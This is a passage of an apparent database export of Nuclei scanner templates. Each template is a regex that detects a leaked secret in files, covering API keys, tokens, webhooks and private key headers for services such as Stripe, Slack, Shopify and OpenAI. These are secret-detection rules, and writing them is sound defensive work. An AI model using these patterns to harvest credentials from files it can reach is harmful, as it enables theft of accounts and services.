490a004630440220077946f13881a3f72dcf81af66d6441c54bcfa9ebf55bb2a9b9b8e16ca48f82c022071b09b7aa278782ba81b70d8da7eed2b6876da0e551fc1a23533e1d67f4cce02:922c64590222798bb761d5b6d8e72950\n", "hash": "d72f9ec4fbd43520fd824107b052e06d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cef" }, "name": "heroku-key.yaml", "content": "id: heroku-key\n\ninfo:\n name: Heroku API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/heroku.yml\n - https://devcenter.heroku.com/articles/authentication\n metadata:\n verified: true\n tags: file,keys,heroku,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)heroku.{0,20}key.{0,20}\\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\\b'\n# digest: 
4a0a00473045022100e9a5fe2b9b5307955ba8c070625b450f87018040278cac9d857936ad0a3b43fc022030fdf2d770b0a7de20c15055be3d5c8cde50df6937d8ebf01072ac9f83b9f461:922c64590222798bb761d5b6d8e72950", "hash": "c2abcd8908664cff885b644bc96ac8d4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf0" }, "name": "jenkins-token.yaml", "content": "id: jenkins-token\n\ninfo:\n name: Jenkins Token or Crumb\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/jenkins.yml\n - https://www.jenkins.io/blog/2018/07/02/new-api-token-system/\n - https://www.jenkins.io/doc/book/security/csrf-protection/\n metadata:\n verified: true\n tags: file,keys,jenkins,crumb,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\\b([0-9a-f]{32,36})\\b'\n# digest: 4b0a00483046022100bbae117ce6e36c2edabf974fd82254d93119455c3ffaae610bba874bb154fd14022100c94a0e7d792202691a4e8608e7cefcf2bcd0323c9b4c9dacb555345000ec4b0b:922c64590222798bb761d5b6d8e72950", "hash": "7cdc0159cc500c2321ad57a0857dfab8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf1" }, "name": "linkedin-id.yaml", "content": "id: linkedin-id\n\ninfo:\n name: Linkedin Client ID\n author: gaurang\n severity: low\n tags: file,keys,token,linkedin\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}\"\n# digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950", "hash": "30b160f9388b14e88932d3de8b2c4f2e", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf2" }, "name": "mailchimp-api.yaml", "content": "id: mailchimp-api-key\n\ninfo:\n name: Mailchimp API Key\n author: gaurang\n severity: high\n 
tags: keys,file,token,mailchimp\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[0-9a-f]{32}-us[0-9]{1,2}\"\n# digest: 4a0a00473045022100b7d7dc7f716b2b6aa9f8fc0e8f2455cd4598868f7cdf43257e6359058f2bb4ab02201b98b540e564948f56babb33b53688a32a426e54dc32d0ca159d70eebb798191:922c64590222798bb761d5b6d8e72950", "hash": "baaaac0f7e353a7b4c9cd079ff87e8c9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf3" }, "name": "mailgun-api.yaml", "content": "id: mailgun-api-key\n\ninfo:\n name: Mailgun API Key\n author: gaurang\n severity: high\n tags: file,keys,token,mailgun\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"key-[0-9a-zA-Z]{32}\"\n# digest: 4a0a00473045022006098cd86f41bfb24a9c4c7c6bfc1a855c71c69e8b834739e5ffc4567261266c022100bd407109d7d54367361ebda630747d01a6ba308679d3f50a1654629aa9da4873:922c64590222798bb761d5b6d8e72950", "hash": "b9a2a8345cb43406f2017662ad3e18e6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf4" }, "name": "mapbox-token.yaml", "content": "id: mapbox-token\n\ninfo:\n name: Mapbox Token\n author: Devang-Solanki\n severity: medium\n reference:\n - https://docs.gitguardian.com/secrets-detection/detectors/specifics/mapbox_token\n - https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go\n metadata:\n verified: true\n tags: file,keys,token,mapbox\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: mapbox-public-token\n part: body\n regex:\n - 'pk\\.eyJ1Ijoi\\w+\\.[\\w-]*'\n\n - type: regex\n name: mapbox-secret-token\n part: body\n regex:\n - 'sk\\.eyJ1Ijoi\\w+\\.[\\w-]*'\n# digest: 4a0a00473045022100a7ea48306be5c2b2cfc395952e068bd2e299957868b11ba57c2c45fa49ff188502201ba10a29d5332a82ed0fa1c984668ce2df5e2213391127664a2eef6a04a299a9:922c64590222798bb761d5b6d8e72950", "hash": "8d50cf43d6471cc5071d0fc68ddd0e45", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf307cf5" }, "name": "npm-accesstoken.yaml", "content": "id: npm-accesstoken\n\ninfo:\n name: NPM Access Token (fine-grained)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/npm.yml\n - https://docs.npmjs.com/about-access-tokens\n - https://github.com/github/roadmap/issues/557\n - https://github.blog/changelog/2022-12-06-limit-scope-of-npm-tokens-with-the-new-granular-access-tokens/\n metadata:\n verified: true\n tags: keys,file,npm,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"\\b(npm_[A-Za-z0-9]{36})\\b\"\n# digest: 490a00463044022039866b0873f183f09afcd27823a4cc86515fb680c821d4ed80919cfa1ff69ac502202599aa40303d5467e19c13645105ca6c34c17796b73d6fabba5631c2476b3a73:922c64590222798bb761d5b6d8e72950", "hash": "d3f1b6907d23dd3b868d6f62755b90aa", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf6" }, "name": "nuget-key.yaml", "content": "id: nuget-key\n\ninfo:\n name: NuGet API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/nuget.yml\n - https://docs.microsoft.com/en-us/nuget/nuget-org/publish-a-package#create-api-keys\n metadata:\n verified: true\n tags: keys,file,nuget,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(oy2[a-z0-9]{43})\"\n# digest: 4a0a004730450221009ee6a3a09c234f4c41ee6c71b99a1461f714627ed8456ccd26fcd90b919ae3ec02203456759520c590ad30114fbac0a6723adb8c53dfd531b655d1af290117c24c04:922c64590222798bb761d5b6d8e72950", "hash": "3c7d90b541d00e91ee8abe666b5e85fb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf7" }, "name": "openai-key.yaml", "content": "id: openai-key\n\ninfo:\n name: OpenAI API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - 
https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/openai.yml\n - https://platform.openai.com/docs/api-reference\n - https://platform.openai.com/docs/api-reference/authentication\n metadata:\n verified: true\n tags: file,keys,openai,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(sk-[a-zA-Z0-9]{48})\\b\n# digest: 4a0a004730450220546f51da9aae790d391a6842237a517f47af7be274bdfa184f865fef630755fb022100fd67b83c7512040fa26564d51c5b03b08f6dc269a73b1fed32b696c5809bbc1c:922c64590222798bb761d5b6d8e72950", "hash": "0e44faa8fdff13ffa136ef8dc46f8b85", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf8" }, "name": "paypal-braintree-token.yaml", "content": "id: paypal-braintree-token\n\ninfo:\n name: Paypal Braintree Access Token\n author: gaurang\n severity: high\n tags: file,keys,token,paypal\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"access_token\\\\$production\\\\$[0-9a-z]{16}\\\\$[0-9a-f]{32}\"\n# digest: 490a00463044022056d84dc6d601838e144b52aad17f5d96f5d7e968e394d85f12af03219b51d114022031accb17f2ac43db6480cb37ecd697e1c9b44aea60e02212aecf0eaa8163b0b8:922c64590222798bb761d5b6d8e72950", "hash": "b16d6a8881446884a0ab9a8bb7ed2239", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf9" }, "name": "pictatic-api-key.yaml", "content": "id: pictatic-api-key\n\ninfo:\n name: Pictatic API Key\n author: gaurang\n severity: high\n tags: keys,file,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"sk_live_[0-9a-z]{32}\"\n# digest: 4a0a00473045022032fdd5dc224eeaffdef7c05502dfedc31e1bc930a446a4321c9b4e0943bff1c702210091f33fc218848d1e5987c600944cc9ba59195eb6891d01cd0052263c224464f8:922c64590222798bb761d5b6d8e72950", "hash": "445dae1966917bf09b92825f213c6f67", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfa" }, "name": 
"postman-api-key.yaml", "content": "id: postman-api-key\n\ninfo:\n name: Postman API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/postman.yml\n - https://learning.postman.com/docs/developer/intro-api/\n metadata:\n verified: true\n tags: postman,keys,file,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(PMAK-[a-zA-Z0-9]{24}-[a-zA-Z0-9]{34})\\b'\n\n# digest: 4b0a00483046022100e158e3c9539a86553368be020b6a63e4d2d7383d5ebabfc763746408d78466c3022100dd689e22c94823f880d079b79edb861cfc02f9dd2118c70b8fc23efe6047c933:922c64590222798bb761d5b6d8e72950\n", "hash": "d3cc97c5b96f8892b45258c73abd0ef5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfb" }, "name": "private-key.yaml", "content": "id: private-key\n\ninfo:\n name: Private Key Detect\n author: gaurang,geeknik\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"BEGIN OPENSSH PRIVATE KEY\"\n - \"BEGIN PRIVATE KEY\"\n - \"BEGIN RSA PRIVATE KEY\"\n - \"BEGIN DSA PRIVATE KEY\"\n - \"BEGIN EC PRIVATE KEY\"\n - \"BEGIN PGP PRIVATE KEY BLOCK\"\n - \"ssh-rsa\"\n - \"ssh-dsa\"\n - \"ssh-ed25519\"\n# digest: 4a0a004730450220012882f3d65764d754d5f19daface386c18880d36acae666c3661a7b5fac3489022100fbcfdc07b0b9362befde988d181bf2f3af23847bcb67d65249c51c918db3a4db:922c64590222798bb761d5b6d8e72950", "hash": "679910025fbaf2fed64be48c84bf14f5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfc" }, "name": "pypi-token.yaml", "content": "id: pypi-token\n\ninfo:\n name: PyPI Upload Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/pypi.yml\n - https://github.com/pypa/warehouse/issues/6051\n - https://pypi.org/project/pypitoken/\n metadata:\n verified: 
true\n tags: file,keys,pypi,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})\"\n# digest: 4b0a004830460221008fd309bb55fdcb10af63f0e5c49e66f96b5b63598001fd085e6ad1d7db4676480221009f8481869b196778dc1aa0a750367371173d1f41449f4dcb5cb906eaaa9f377b:922c64590222798bb761d5b6d8e72950", "hash": "6440e9319daf545b74b3e673ef77320f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfd" }, "name": "razorpay-client-id.yaml", "content": "id: razorpay-client-id\n\ninfo:\n name: Razorpay Client ID\n author: Devang-Solanki\n severity: high\n reference:\n - https://github.com/streaak/keyhacks#Razorpay-keys\n - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey\n tags: file,keys,token,razorpay\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"rzp_(live|test)_.{14}\"\n# digest: 490a00463044022017958bca8d151dc9ccf82c6616ee782cd94dcfb9604195b37eab0e712de46b3a02205a23692aefd5d8b35b942ea874507b2b25b217c384ac028b05bf3882293cb32e:922c64590222798bb761d5b6d8e72950", "hash": "d33999daeb18bc1ee590634881e66cd1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfe" }, "name": "rubygems-key.yaml", "content": "id: rubygems-key\n\ninfo:\n name: RubyGems API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/rubygems.yml\n - https://guides.rubygems.org/rubygems-org-api/\n - https://guides.rubygems.org/api-key-scopes/\n metadata:\n verified: true\n tags: file,keys,rubygems,token,ruby\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(rubygems_[a-f0-9]{48})\"\n# digest: 4a0a0047304502207bd78ce7b44dacf6aae4fbaa6afa5d82c7085d2cb323667240aff8b7d949cedb022100eeb152ea7c2cced5093efcfd79da8b9d80a89d1a8eb29b0ee3ed50ae61a49f15:922c64590222798bb761d5b6d8e72950", "hash": 
"4c73fb0f238f37975dd2e785ad394700", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cff" }, "name": "s3-bucket.yaml", "content": "id: s3-bucket\n\ninfo:\n name: S3 Bucket Detect\n author: gaurang\n severity: info\n tags: file,keys,token,bucket\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-z0-9.-]+\\\\.s3\\\\.amazonaws\\\\.com\"\n - \"[a-z0-9.-]+\\\\.s3-[a-z0-9-]\\\\.amazonaws\\\\.com\"\n - \"[a-z0-9.-]+\\\\.s3-website[.-](eu|ap|us|ca|sa|cn)\"\n - \"//s3\\\\.amazonaws\\\\.com/[a-z0-9._-]+\"\n - \"//s3-[a-z0-9-]+\\\\.amazonaws\\\\.com/[a-z0-9._-]+\"\n# digest: 4a0a00473045022100c3ed21e6ff1fb637d42e18ec4636575c7df1069d9e355656d5f77ddb3a8fc8d7022027fc3fa8178e359af3509cc94dc1bf96cade6095d69409c4f521ef0175b091aa:922c64590222798bb761d5b6d8e72950", "hash": "2196111e0bc20b7b759b3de5c25b0712", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d00" }, "name": "sauce-access-token.yaml", "content": "id: sauce-access-token\n\ninfo:\n name: Sauce Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/sauce.yml\n metadata:\n verified: true\n tags: file,keys,sauce,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)sauce.{0,50}\\b([a-f0-9-]{36})\\b'\n# digest: 490a00463044022009ca563154c28786be32017d641fca7d37b8615cd7054e15823cff495a98bba3022066116c3e58abf5f5091e8f649632b0a9768878dee3a7ea572eedac7adcdefdd6:922c64590222798bb761d5b6d8e72950", "hash": "c4e039c91650fdb0d68b57a9e1bc03cc", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d01" }, "name": "segment-public-api.yaml", "content": "id: segment-public-api\n\ninfo:\n name: Segment Public API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/segment.yml\n - 
https://segment.com/docs/api/public-api/\n - https://segment.com/blog/how-segment-proactively-protects-customer-api-tokens/\n metadata:\n verified: true\n tags: keys,file,segment,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(sgp_[a-zA-Z0-9]{64})'\n# digest: 4a0a0047304502202853fa0be0aad155b1bf710601dcb5443ebc8151a5852ae0e2c70357f8106f7c022100ab93a75342e2a408aa930452457c8bd908f297beb34396cf97af7ed89e76cf38:922c64590222798bb761d5b6d8e72950", "hash": "561caf6f78a25f01a83081a7c5e798dd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d02" }, "name": "sendgrid-api.yaml", "content": "id: sendgrid-api-key-file\n\ninfo:\n name: Sendgrid API Key\n author: gaurang\n severity: high\n tags: keys,file,token,sendgrid\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"SG\\\\.[a-zA-Z0-9]{22}\\\\.[a-zA-Z0-9]{43}\"\n# digest: 4b0a00483046022100d3c8e8d194bf1de6ea48f9c0ed47cf49cc66a5f44195732b29617199ae5a360b022100d00c1fa924b6444959e020764b71559bc85f140c3c912d76e0fc6c35abe161d9:922c64590222798bb761d5b6d8e72950", "hash": "8b438f95b7b5b69b1d64cb82eff7467c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d03" }, "name": "shopify-custom-token.yaml", "content": "id: shopify-custom-token\n\ninfo:\n name: Shopify Custom App Access Token\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shpca_[a-fA-F0-9]{32}\"\n# digest: 4a0a00473045022034a27b39b96e56d6c5c5f0bb8437e6760ba81fa31281a386906e8eaea515bca9022100b8c26487144b3cc4e78cfd69fc39a62fe1eab148e86bcd6101a5beeb2ec3015e:922c64590222798bb761d5b6d8e72950", "hash": "3504329da4014f5855803bd8cf70ca0b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d04" }, "name": "shopify-private-token.yaml", "content": "id: shopify-private-token\n\ninfo:\n name: Shopify Private App 
Access Token\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shppa_[a-fA-F0-9]{32}\"\n# digest: 4b0a004830460221008a9fcfd1953cd27472015171cc2ff718e69112124812210ea6ba818da8c0de17022100a5dd54d3323017b989e594baf393a6915d32c96622b2be024cfad826b8a9d773:922c64590222798bb761d5b6d8e72950", "hash": "28d7a06aa087e21ab7f1a48946be5d12", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d05" }, "name": "shopify-public-access.yaml", "content": "id: shopify-public-access\n\ninfo:\n name: Shopify Access Token (Public App)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/shopify.yml\n - https://shopify.dev/apps/auth\n - https://shopify.dev/changelog/app-secret-key-length-has-increased\n metadata:\n verified: true\n tags: file,keys,shopify,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(shpat_[a-fA-F0-9]{32})\\b'\n# digest: 4a0a00473045022056ae9c25283c7b064051f029d5dba8a224e83494727342a07f6ac9e97c7d96ad02210094d395337ca85abb5d825cab42781d3a2091f59355519823e9b7ec7994b8bd70:922c64590222798bb761d5b6d8e72950", "hash": "f6a9c054cab3eca2bf51fca3ac9ccb09", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d06" }, "name": "shopify-shared-secret.yaml", "content": "id: shopify-shared-secret\n\ninfo:\n name: Shopify Shared Secret\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shpss_[a-fA-F0-9]{32}\"\n# digest: 4a0a00473045022070a5f8b18d6bfa572f7903f81f2f46a542b0e08c7dd5a822be8d79ded225a81e022100f75c2fa4f6a9aa7217aab9cf51b808d6008d492b2f8230650519227e95d98050:922c64590222798bb761d5b6d8e72950", "hash": "e4581078f4ed7a5241c79a64713e737b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307d07" }, "name": "shopify-token.yaml", "content": "id: shopify-access-token\n\ninfo:\n name: Shopify Access Token\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shpat_[a-fA-F0-9]{32}\"\n# digest: 4a0a0047304502200b41777dd82b3d396f4d76d75a526b7f5f863f8f1d2b4e313990480c398917ef022100810ddcd217e57655538d9153e898ad34e32c9b3179aceac031fbaf698de6ecc4:922c64590222798bb761d5b6d8e72950", "hash": "5778ad92859ff0dee06ed4739eb57c28", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d08" }, "name": "slack-api.yaml", "content": "id: slack-api\n\ninfo:\n name: Slack API Key\n author: gaurang\n severity: high\n tags: file,keys,token,slack\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"xox[baprs]-([0-9a-zA-Z]{10,48})?\"\n# digest: 4a0a004730450220098e1929b6ec4c0b3e189cebf5142b7ee75dfd23c8c9303e1a9b43f25e00c94b02210094541a8012719eec9a5b6fb643a3ef4050a67ef02165ba3eb94120d6458fb5c7:922c64590222798bb761d5b6d8e72950", "hash": "f4a3106e204e3afda508804b44ed88be", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d09" }, "name": "slack-webhook.yaml", "content": "id: slack-webhook\n\ninfo:\n name: Slack Webhook\n author: gaurang\n severity: high\n tags: file,keys,token,slack\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"https://hooks.slack.com/services/T[0-9A-Za-z\\\\-_]{8}/B[0-9A-Za-z\\\\-_]{8}/[0-9A-Za-z\\\\-_]{24}\"\n# digest: 490a00463044022030754b3461d730219fc7c4e9ce0b08cb582a6842e1161dd92551d5c86bde1a88022070d798d9356477fdda4e122fe64f5b6f981b7db9d85596b65e8e49b20f2dc657:922c64590222798bb761d5b6d8e72950", "hash": "270314cdc70124cf0ede13e4e0a38aee", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0a" }, "name": "square-access-token.yaml", "content": "id: square-access-token\n\ninfo:\n name: Square Access 
Token\n author: gaurang,daffainfo\n severity: high\n tags: file,keys,token,square\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"EAAAE[a-zA-Z0-9_-]{59}\"\n - \"sq0atp-[0-9A-Za-z\\\\-_]{22}\"\n# digest: 490a00463044022016fc50e7940f4fb9d85db1563b7e86d644facdd66f530692b600d6cb0c4d3438022050fff84340f9f8afe3efbaeb9063ebc13bb5f4df8c13f328258d07ee43cc1998:922c64590222798bb761d5b6d8e72950", "hash": "00bd235d90cffb78264c8376272e9c47", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0b" }, "name": "square-oauth-secret.yaml", "content": "id: square-oauth-secret\n\ninfo:\n name: Square OAuth Secret\n author: gaurang\n severity: high\n tags: file,keys,token,square\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"sq0csp-[0-9A-Za-z\\\\-_]{43}\"\n# digest: 4b0a00483046022100b9d713ce6825a6aa6f3a38bb156f20588d72be414cdb570f0946f7dda4c809c7022100ab886a6c8e1afb2b271507fc2fe390137235ad84e1de02247de49ee5a86e3cfa:922c64590222798bb761d5b6d8e72950", "hash": "72430375c5345fcbe13c26160976e567", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0c" }, "name": "stackhawk-api-key.yaml", "content": "id: stackhawk-api-key\n\ninfo:\n name: StackHawk API Key\n author: hazana\n severity: medium\n reference:\n - https://docs.stackhawk.com/apidocs.html\n metadata:\n verified: true\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"hawk\\\\.[0-9A-Za-z\\\\-_]{20}\\\\.[0-9A-Za-z\\\\-_]{20}\"\n# digest: 4a0a0047304502210097611c22dad431694acb1a7b7233bb23042461df6249cc72c417adf3d005f1250220257f95a6d89864ee22c1465cbd0bffb16a05aa4f28787ec0d65a7407d3258166:922c64590222798bb761d5b6d8e72950", "hash": "97f1fe976a009918bcd343d89acab03f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0d" }, "name": "stripe-api-key.yaml", "content": "id: stripe-api-key\n\ninfo:\n name: Stripe API Key\n 
author: gaurang\n severity: high\n tags: file,keys,token,stripe\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}\"\n# digest: 4a0a00473045022100dcb13029ebf479d6aca563b1f1955ac0498c974f35af12006c2f9ebbb45c66770220286512d9e87b5923252c2c4fbb86ee621c42a66ec40ef13cd70937292e099cfa:922c64590222798bb761d5b6d8e72950", "hash": "d2be575c966e7cfe65a3877d93db3fe0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0e" }, "name": "telegram-token.yaml", "content": "id: telegram-token\n\ninfo:\n name: Telegram Bot Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/telegram.yml\n - https://core.telegram.org/bots/api\n - https://core.telegram.org/bots/features#botfather\n metadata:\n verified: true\n tags: file,keys,telegram,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(\\d+:AA[a-zA-Z0-9_-]{32,33})'\n# digest: 4a0a0047304502200d5ed3c8bfb5e36d8156b70f6307bdd05abdf92a55e6d486eac1ec3c88de967f022100fcd85801f37c8f52fa00d37262a861f0deec088f50d750da360932ff8ba21515:922c64590222798bb761d5b6d8e72950", "hash": "321abead679bd2e43e9511130556807c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0f" }, "name": "twilio-api.yaml", "content": "id: twilio-api\n\ninfo:\n name: Twilio API Key\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)twilio(.{0,20})?SK[0-9a-f]{32}\"\n# digest: 4b0a004830460221009edd6055d2937d438ddc5a460cb57ceaf448ee273900a3a2ff9d217329cbaf170221009df1b8754959e50ef0155608d8ea98f45e87c59221868f7ad7a762ba88ba28fc:922c64590222798bb761d5b6d8e72950", "hash": "3b7e60ea862f78b7b6623bb06f5400eb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d10" }, "name": 
"zapier-webhook.yaml", "content": "id: zapier-webhook\n\ninfo:\n name: Zapier Webhook\n author: Devang-Solanki\n severity: high\n reference:\n - https://github.com/streaak/keyhacks#Zapier-Webhook-Token\n - https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url\n tags: file,keys,token,zapier\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - 'https://(?:www.)?hooks\\.zapier\\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'\n# digest: 4a0a004730450221009177769af7a8468ea644e7787fa6c35c65b057e8ad3b35b6d27e064a3763add30220734af477f469387822e7570ce196e8907ac3d4bb13b77be3d6b432944fce1e4a:922c64590222798bb761d5b6d8e72950", "hash": "9250f1e1c3d8159119bf6c20191830e6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d11" }, "name": "zendesk-secret-key.yaml", "content": "id: zendesk-secret-key\n\ninfo:\n name: Zendesk Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go\n metadata:\n verified: true\n tags: zendesk,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:zendesk)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100ee6bae1cf90faa1beeae922204d58b2300e6ca7bf92065cb8a8402c597a1739002202c8bb2ae82d2e6c109dce0cce6fcb9d17f9f2977b098e1710dbdb8aafd92b8cd:922c64590222798bb761d5b6d8e72950\n", "hash": "0eceb3f1c41ec29f0ffae553067bb12e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d12" }, "name": "adobe-client.yaml", "content": "id: adobe-client\n\ninfo:\n name: Adobe Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - 
